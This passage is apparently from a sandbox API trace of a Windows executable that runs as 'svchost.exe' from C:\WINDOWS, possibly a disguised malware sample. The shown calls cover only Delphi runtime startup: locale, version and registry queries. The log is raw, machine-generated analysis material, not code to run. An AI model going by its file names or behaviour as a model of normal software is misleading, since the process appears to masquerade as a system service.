dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x24a, hStdError=0x1f80)) [0098.706] GetACP () returned 0x4e4 [0098.706] GetCurrentThreadId () returned 0x1358 [0098.706] GetVersion () returned 0x3ad7000a [0098.706] GetVersionExW (in: lpVersionInformation=0x19fc1c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x772e7290, dwBuildNumber=0x40cfbc, dwPlatformId=0x19fc68, szCSDVersion="") | out: lpVersionInformation=0x19fc1c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0098.707] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x19dadc, nSize=0x20a | out: lpFilename="C:\\WINDOWS\\svchost.exe" (normalized: "c:\\windows\\svchost.exe")) returned 0x16 [0098.707] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19d8c6, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\svchost.exe" (normalized: "c:\\windows\\svchost.exe")) returned 0x16 [0098.707] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x23a0000 [0098.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d840 | out: phkResult=0x19d840*=0x0) returned 0x2 [0098.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d840 | out: phkResult=0x19d840*=0x0) returned 0x2 [0098.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d840 | out: phkResult=0x19d840*=0x0) returned 0x2 [0098.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d840 | out: phkResult=0x19d840*=0x0) returned 0x2 [0098.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d840 | out: phkResult=0x19d840*=0x0) returned 0x2 [0098.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19d840 | out: phkResult=0x19d840*=0x0) returned 0x2 [0098.708] GetUserDefaultUILanguage () returned 0x409 [0098.708] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0098.709] GetThreadUILanguage () returned 0x190409 [0098.709] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19d81c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19d844 | out: pulNumLanguages=0x19d81c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x19d844) returned 1 [0098.709] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x19d81c, pwszLanguagesBuffer=0x24ca680, pcchLanguagesBuffer=0x19d844 | out: pulNumLanguages=0x19d81c, pwszLanguagesBuffer=0x24ca680, pcchLanguagesBuffer=0x19d844) returned 1 [0098.709] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\svchost.en-US", lpFindFileData=0x19d5e4 | out: lpFindFileData=0x19d5e4*(dwFileAttributes=0x19d854, ftCreationTime.dwLowDateTime=0x19d64c, ftCreationTime.dwHighDateTime=0x77a35acc, ftLastAccessTime.dwLowDateTime=0x9c0000, ftLastAccessTime.dwHighDateTime=0x19d758, ftLastWriteTime.dwLowDateTime=0x77a35acc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x77a35b15, dwReserved0=0x4ac1ecf2, dwReserved1=0x24ca680, cFileName="", cAlternateFileName="쀬ɋ놘@\x13")) returned 0xffffffff [0098.709] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\svchost.en", lpFindFileData=0x19d5e4 | out: lpFindFileData=0x19d5e4*(dwFileAttributes=0x19d854, ftCreationTime.dwLowDateTime=0x19d64c, ftCreationTime.dwHighDateTime=0x77a35acc, ftLastAccessTime.dwLowDateTime=0x9c0000, ftLastAccessTime.dwHighDateTime=0x19d758, ftLastWriteTime.dwLowDateTime=0x77a35acc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x77a35b15, dwReserved0=0x4ac1ecf2, dwReserved1=0x24ca680, cFileName="", cAlternateFileName="赬ɍ놘@\x13")) returned 0xffffffff [0098.710] GetUserDefaultUILanguage () returned 0x409 [0098.710] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x19d860, cchData=4 | out: lpLCData="ENU") returned 4 [0098.710] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\svchost.ENU", lpFindFileData=0x19d5ec | out: lpFindFileData=0x19d5ec*(dwFileAttributes=0x77a35acc, ftCreationTime.dwLowDateTime=0x9c0000, ftCreationTime.dwHighDateTime=0x19d758, ftLastAccessTime.dwLowDateTime=0x77a35acc, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x77a35b15, nFileSizeHigh=0x4ac1ecf2, nFileSizeLow=0x24ca680, dwReserved0=0x9c0000, dwReserved1=0x19d758, cFileName="￾￿媛瞣屇瞠\x08", cAlternateFileName="赬ɍ놘@\x13")) returned 0xffffffff [0098.710] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\svchost.EN", lpFindFileData=0x19d5ec | out: lpFindFileData=0x19d5ec*(dwFileAttributes=0x77a35acc, ftCreationTime.dwLowDateTime=0x9c0000, ftCreationTime.dwHighDateTime=0x19d758, ftLastAccessTime.dwLowDateTime=0x77a35acc, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x77a35b15, nFileSizeHigh=0x4ac1ecf2, nFileSizeLow=0x24ca680, dwReserved0=0x9c0000, dwReserved1=0x19d758, cFileName="￾￿媛瞣屇瞠\x08", cAlternateFileName="赬ɍ놘@\x13")) returned 0xffffffff [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffb0, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffcf, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffce, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffcd, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffcc, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffcb, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffc9, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffca, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffd8, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0098.710] LoadStringW (in: hInstance=0x400000, uID=0xffd7, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0098.711] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0098.711] LoadStringW (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0098.711] LoadStringW (in: hInstance=0x400000, uID=0xffda, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0098.711] LoadStringW (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0098.712] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x19dd0c, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0098.713] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x19dd04, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0098.713] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x19dd04, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0098.713] GetVersionExW (in: lpVersionInformation=0x19fc18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19fc18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0098.713] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0098.714] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xa18198 [0098.714] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0098.714] GetNativeSystemInfo (in: lpSystemInfo=0x19fbf4 | out: lpSystemInfo=0x19fbf4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0098.714] GetFileVersionInfoSizeW (in: lptstrFilename="kernel32.dll", lpdwHandle=0x19fbd0 | out: lpdwHandle=0x19fbd0) returned 0x72c [0098.719] GetFileVersionInfoW (in: lptstrFilename="kernel32.dll", dwHandle=0x0, dwLen=0x72c, lpData=0x2488800 | out: lpData=0x2488800) returned 1 [0098.719] VerQueryValueW (in: pBlock=0x2488800, lpSubBlock="\\", lplpBuffer=0x19fbc8, puLen=0x19fbc4 | out: lplpBuffer=0x19fbc8*=0x2488828, puLen=0x19fbc4) returned 1 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x19dbdc, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0098.719] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x80) returned 0x200000 [0098.719] VerifyVersionInfoW (in: lpVersionInformation=0x19fabc, dwTypeMask=0x80, dwlConditionMask=0x200000 | out: lpVersionInformation=0x19fabc) returned 1 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xff36, lpBuffer=0x19dbdc, cchBufferMax=4096 | out: lpBuffer="Windows 10") returned 0xa [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x19dcfc, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x19dcfc, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x19dcfc, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x19dcfc, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x19dcfc, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x19dcfc, cchBufferMax=4096 | out: lpBuffer="Invalid filename") returned 0x10 [0098.719] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x19dcfc, cchBufferMax=4096 | out: lpBuffer="File not found") returned 0xe [0098.720] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fae2, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\svchost.exe" (normalized: "c:\\windows\\svchost.exe")) returned 0x16 [0098.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fcf0 | out: phkResult=0x19fcf0*=0x0) returned 0x2 [0098.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fcf0 | out: phkResult=0x19fcf0*=0x0) returned 0x2 [0098.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fcf0 | out: phkResult=0x19fcf0*=0x0) returned 0x2 [0098.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fcf0 | out: phkResult=0x19fcf0*=0x0) returned 0x2 [0098.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fcf0 | out: phkResult=0x19fcf0*=0x0) returned 0x2 [0098.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19fcf0 | out: phkResult=0x19fcf0*=0x0) returned 0x2 [0098.721] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0098.721] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalProcessorInformation") returned 0x772e71b0 [0098.721] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0098.721] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xa18120 [0098.721] GetProcAddress (hModule=0x772d0000, lpProcName="GetLogicalProcessorInformation") returned 0x772e71b0 [0098.721] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x19fcd4 | out: Buffer=0x0, ReturnedLength=0x19fcd4) returned 0 [0098.721] GetLastError () returned 0x7a [0098.721] GetLogicalProcessorInformation (in: Buffer=0x24814d0, ReturnedLength=0x19fcd4 | out: Buffer=0x24814d0, ReturnedLength=0x19fcd4) returned 1 [0098.721] GetCurrentThreadId () returned 0x1358 [0098.721] GetCurrentThreadId () returned 0x1358 [0098.721] GetVersionExW (in: lpVersionInformation=0x19fbe4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa05318, dwMinorVersion=0x4ac1c14e, dwBuildNumber=0x19fc24, dwPlatformId=0x74ca9861, szCSDVersion="") | out: lpVersionInformation=0x19fbe4*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0098.721] GetCurrentThreadId () returned 0x1358 [0098.721] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0098.721] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CompareStringOrdinal", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.721] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CompareStringOrdinal", cchWideChar=20, lpMultiByteStr=0x24980dc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareStringOrdinal", lpUsedDefaultChar=0x0) returned 20 [0098.722] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringOrdinal") returned 0x772e7070 [0098.722] GetThreadLocale () returned 0x409 [0098.722] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x19fc28 | out: lpCPInfo=0x19fc28) returned 1 [0098.722] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0098.722] GetCurrentThreadId () returned 0x1358 [0098.722] GetCurrentThreadId () returned 0x1358 [0098.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x19f9a4, cchData=256 | out: lpLCData="2") returned 2 [0098.723] GetThreadLocale () returned 0x409 [0098.723] EnumCalendarInfoW (lpCalInfoEnumProc=0x42688c, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0098.724] GetThreadLocale () returned 0x409 [0098.724] EnumCalendarInfoW (lpCalInfoEnumProc=0x426924, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0098.724] GetCurrentThreadId () returned 0x1358 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Sun") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Sunday") returned 7 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Mon") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Monday") returned 7 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Tue") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Tuesday") returned 8 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Wed") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Wednesday") returned 10 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Thu") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Thursday") returned 9 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Fri") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Friday") returned 7 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Sat") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x19f98c, cchData=256 | out: lpLCData="Saturday") returned 9 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x19f990, cchData=256 | out: lpLCData="Jan") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x19f990, cchData=256 | out: lpLCData="January") returned 8 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x19f990, cchData=256 | out: lpLCData="Feb") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x19f990, cchData=256 | out: lpLCData="February") returned 9 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x19f990, cchData=256 | out: lpLCData="Mar") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x19f990, cchData=256 | out: lpLCData="March") returned 6 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x19f990, cchData=256 | out: lpLCData="Apr") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x19f990, cchData=256 | out: lpLCData="April") returned 6 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x19f990, cchData=256 | out: lpLCData="May") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x19f990, cchData=256 | out: lpLCData="May") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x19f990, cchData=256 | out: lpLCData="Jun") returned 4 [0098.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x19f990, cchData=256 | out: lpLCData="June") returned 5 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x19f990, cchData=256 | out: lpLCData="Jul") returned 4 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x19f990, cchData=256 | out: lpLCData="July") returned 5 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x19f990, cchData=256 | out: lpLCData="Aug") returned 4 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x19f990, cchData=256 | out: lpLCData="August") returned 7 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x19f990, cchData=256 | out: lpLCData="Sep") returned 4 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x19f990, cchData=256 | out: lpLCData="September") returned 10 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x19f990, cchData=256 | out: lpLCData="Oct") returned 4 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x19f990, cchData=256 | out: lpLCData="October") returned 8 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x19f990, cchData=256 | out: lpLCData="Nov") returned 4 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x19f990, cchData=256 | out: lpLCData="November") returned 9 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x19f990, cchData=256 | out: lpLCData="Dec") returned 4 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x19f990, cchData=256 | out: lpLCData="December") returned 9 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="$") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="0") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="0") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x19fbd8, cchData=2 | out: lpLCData=",") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x19fbd8, cchData=2 | out: lpLCData=".") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="2") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x19fbd8, cchData=2 | out: lpLCData="/") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x19f99c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f99c, cchData=256 | out: lpLCData="1") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x19f99c, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f99c, cchData=256 | out: lpLCData="1") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x19fbd8, cchData=2 | out: lpLCData=":") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="AM") returned 3 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="PM") returned 3 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="0") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="0") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x19f9e0, cchData=256 | out: lpLCData="0") returned 2 [0098.725] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x19fbd8, cchData=2 | out: lpLCData=",") returned 2 [0098.725] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x77440000 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VariantChangeTypeEx") returned 0x7745a610 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarNeg") returned 0x774a52c0 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarNot") returned 0x774a6560 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarAdd") returned 0x7747d610 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarSub") returned 0x7747e3e0 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarMul") returned 0x7747db10 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarDiv") returned 0x774a5800 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarIdiv") returned 0x774a61a0 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarMod") returned 0x774a6400 [0098.726] GetProcAddress (hModule=0x77440000, lpProcName="VarAnd") returned 0x77473200 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarOr") returned 0x774a6610 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarXor") returned 0x774a67b0 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarCmp") returned 0x774660b0 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarI4FromStr") returned 0x77466ec0 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarR4FromStr") returned 0x77473010 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarR8FromStr") returned 0x77473630 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarDateFromStr") returned 0x77468b90 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarCyFromStr") returned 0x77452d90 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarBoolFromStr") returned 0x774648f0 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarBstrFromCy") returned 0x77467f50 [0098.727] GetProcAddress (hModule=0x77440000, lpProcName="VarBstrFromDate") returned 0x774689c0 [0098.728] GetProcAddress (hModule=0x77440000, lpProcName="VarBstrFromBool") returned 0x774648a0 [0098.728] VarBstrFromBool (in: boolIn=0, lcid=0x400, dwFlags=0x0, pbstrOut=0x19fd18 | out: pbstrOut=0x19fd18*="False") returned 0x0 [0098.728] CharLowerBuffW (in: lpsz="False", cchLength=0x5 | 